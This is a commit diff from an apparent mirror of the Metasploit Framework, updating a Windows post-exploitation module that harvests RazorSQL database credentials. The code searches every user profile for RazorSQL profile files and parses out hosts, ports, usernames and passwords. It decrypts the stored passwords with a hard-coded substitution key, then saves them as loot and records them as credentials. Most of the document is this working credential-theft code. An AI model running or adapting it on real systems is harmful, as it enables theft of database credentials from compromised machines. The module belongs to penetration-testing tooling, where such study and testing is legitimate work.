infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update razorsql to use the new cred API

bug/bundler_fix
wchen-r7 2015-06-03 13:49:06 -05:00
parent 9713fe7f99
commit 656f64d9bd
1 changed files with 72 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

97
modules/post/windows/gather/credentials/razorsql.rb
View File

@ -9,6 +9,7 @@ require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
@ -30,6 +31,48 @@ class Metasploit3 < Msf::Post
))
end
def get_profiles
profiles = []
grab_user_profiles.each do |user|
next unless user['ProfileDir']
['.razorsql\\data\\profiles.txt', 'AppData\Roaming\RazorSQL\data\profiles.txt'].each do |profile_path|
file = "#{user['ProfileDir']}\\#{profile_path}"
profiles << file if file?(file)
end
end
profiles
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
session_id: session_db_id,
origin_type: :session,
private_data: opts[:password],
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)
create_credential_login(login_data)
end
def run
print_status("Checking All Users...")
creds_tbl = Rex::Ui::Text::Table.new(
@ -47,19 +90,17 @@ class Metasploit3 < Msf::Post
]
)
grab_user_profiles().each do |user|
next if user['ProfileDir'] == nil
file= user['ProfileDir'] + "\\.razorsql\\data\\profiles.txt"
content = get_content(file)
if content and not content.empty?
creds = parse_content(creds_tbl, content, user['UserName'])
creds.each do |c|
creds_tbl << c
end
get_profiles.each do |profile_path|
content = get_content(profile_path)
next if content.blank?
parse_content(creds_tbl, content).each do |cred|
creds_tbl << cred
end
end
if not creds_tbl.rows.empty?
if creds_tbl.rows.empty?
print_status("No creds collected.")
else
path = store_loot(
'razor.user.creds',
'text/csv',
@ -70,8 +111,6 @@ class Metasploit3 < Msf::Post
)
print_line(creds_tbl.to_s)
print_status("User credentials stored in: #{path}")
else
print_error("No data collected")
end
end
@ -86,9 +125,8 @@ class Metasploit3 < Msf::Post
return content
end
def parse_content(table, content, username)
def parse_content(table, content)
creds = []
print_line("Account: #{username}\n")
content = content.split(/\(\(Z~\]/)
content.each do |db|
database = (db.scan(/database=(.*)/).flatten[0] || '').strip
@ -100,19 +138,22 @@ class Metasploit3 < Msf::Post
pass = (db.scan(/password=(.*)/).flatten[0] ||'').strip
# Decrypt if there's a password
pass = decrypt(pass) if not pass.empty?
decrypted_pass = decrypt(pass) unless pass.blank?
pass = decrypted_pass ? decrypted_pass : pass
# Store data
creds << [user, pass, type, host, port, dbname, database]
# Reort auth info while dumping data
report_auth_info(
:host => host,
:port => port,
:sname => database,
:user => user,
:pass => pass,
:type => 'password'
# Don't report if there's nothing to report
next if user.blank? && pass.blank?
report_cred(
ip: rhost,
port: port.to_i,
service_name: database,
user: user,
password: pass
)
end
@ -140,10 +181,16 @@ class Metasploit3 < Msf::Post
"a" => "<" , "Y" => ">" , "'" => "'" , "^" => "^" , "{" => "{" ,
"}" => "}" , "[" => "[" , "]" => "]" , "~" => "~" , "`" => "`"
}
password=''
password = ''
for letter in encrypted_password.chomp.each_char
password << magic_key[letter]
char = magic_key[letter]
# If there's a nil, it indicates our decryption method does not work for this version.
return nil if char.nil?
password << char
end
return password
end
end